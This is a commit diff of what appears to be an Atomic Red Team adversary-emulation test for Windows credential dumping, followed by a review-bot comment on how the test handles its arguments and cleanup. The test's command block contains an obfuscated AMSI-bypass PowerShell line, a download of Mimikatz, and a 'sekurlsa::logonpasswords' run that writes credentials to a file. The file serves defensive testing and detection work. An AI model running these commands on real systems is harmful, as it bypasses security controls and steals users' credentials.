Commit

Update T1003.yaml
updated indentations
prashanthpulisetti authored Jan 19, 2024
1 parent 82c549e commit b810416
Showing 1 changed file with 31 additions and 31 deletions.
62 changes: 31 additions & 31 deletions atomics/T1003/T1003.yaml
@@ -158,35 +158,35 @@ atomic_tests:
- name: Dumping Credentials using Mimikatz
description: "Demonstrates the capability of Mimikatz to extract credentials from memory, including an AMSI bypass technique."
auto_generated_guid: c70d532b-e6b9-4ef6-9d6e-a8727ec739df
supported_platforms:
- windows
input_arguments:
MimikatzExecutable:
description: "Path to the Mimikatz executable."
type: Path
default: C:\temp\mimikatz.exe
OutputFile:
description: "Path to save the dumped credentials."
type: Path
default: C:\temp\credentials.txt
executor:
name: command_prompt
elevation_required: true
command: |
powershell -Command "sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( '{1}{0}'-F'F','rE' ) ) ; ( GeT-VariaBle ( '1Q2U' +'zX' ) -VaL ).'A`ss`Embly'.'GET`TY`Pe'(( '{6}{3}{1}{4}{2}{0}{5}' -f'Util','A','Amsi','.Management.','utomation.','s','System' ) ).'g`etf`iElD'( ( '{0}{2}{1}' -f'amsi','d','InitFaile' ),( '{2}{4}{0}{1}{3}' -f 'Stat','i','NonPubli','c,' )).'sE`T`VaLUE'( ${n`ULl},${t`RuE} )"
powershell "Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip' -OutFile 'C:\temp\mimikatz.zip'"
powershell "Expand-Archive -Path 'C:\temp\mimikatz.zip' -DestinationPath 'C:\temp'"
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > #{OutputFile}
prerequisites:
- Administrator privileges on the Windows system.
- Internet access to download Mimikatz.
- Configure antivirus software to allow Mimikatz execution for this test.
- Basic command-line proficiency.
cleanup:
- Securely delete the Mimikatz executable, zip file, and output files.
- Reset any altered antivirus settings.
detection:
- Monitor for known Mimikatz process signatures and command-line arguments.
- Detect abnormal access patterns to sensitive files and memory areas.
- Implement behavior-based anomaly detection systems.
supported_platforms:
- windows
input_arguments:
MimikatzExecutable:
description: "Path to the Mimikatz executable."
type: Path
default: C:\temp\mimikatz.exe
OutputFile:
description: "Path to save the dumped credentials."
type: Path
default: C:\temp\credentials.txt
executor:
name: command_prompt
elevation_required: true
command: |
powershell -Command "sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( '{1}{0}'-F'F','rE' ) ) ; ( GeT-VariaBle ( '1Q2U' +'zX' ) -VaL ).'A`ss`Embly'.'GET`TY`Pe'(( '{6}{3}{1}{4}{2}{0}{5}' -f'Util','A','Amsi','.Management.','utomation.','s','System' ) ).'g`etf`iElD'( ( '{0}{2}{1}' -f'amsi','d','InitFaile' ),( '{2}{4}{0}{1}{3}' -f 'Stat','i','NonPubli','c,' )).'sE`T`VaLUE'( ${n`ULl},${t`RuE} )"
powershell "Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip' -OutFile 'C:\temp\mimikatz.zip'"
powershell "Expand-Archive -Path 'C:\temp\mimikatz.zip' -DestinationPath 'C:\temp'"
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > #{OutputFile}
prerequisites:
- Administrator privileges on the Windows system.
- Internet access to download Mimikatz.
- Configure antivirus software to allow Mimikatz execution for this test.
- Basic command-line proficiency.
cleanup:
- Securely delete the Mimikatz executable, zip file, and output files.
- Reset any altered antivirus settings.
detection:
- Monitor for known Mimikatz process signatures and command-line arguments.
- Detect abnormal access patterns to sensitive files and memory areas.
- Implement behavior-based anomaly detection systems.
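Review bot: `MimikatzExecutable` is declared under `input_arguments` but never referenced; the final line of `command` runs `.\mimikatz.exe` relative to whatever the current working directory happens to be, while the archive is expanded into `C:\temp`, so the test only works by accident of cwd. Use the argument instead, e.g. `#{MimikatzExecutable} "privilege::debug" "sekurlsa::logonpasswords" "exit" > #{OutputFile}`, so the default `C:\temp\mimikatz.exe` (or an operator-supplied path) is what actually executes. Related: `prerequisites` and `cleanup` in this hunk are free-form bullet lists, not anything the executor runs, so nothing checks for the download or the AV exclusion before the command runs and nothing removes `C:\temp\mimikatz.zip`, the extracted files, or `#{OutputFile}` afterwards; either turn them into executable checks and a cleanup command or state in the description that they are manual steps. As for the change itself, with leading whitespace stripped in this view the 31 removed and 31 added lines are textually identical, which is consistent with the "updated indentations" commit message; reviewing with whitespace-insensitive diffing would confirm no content moved.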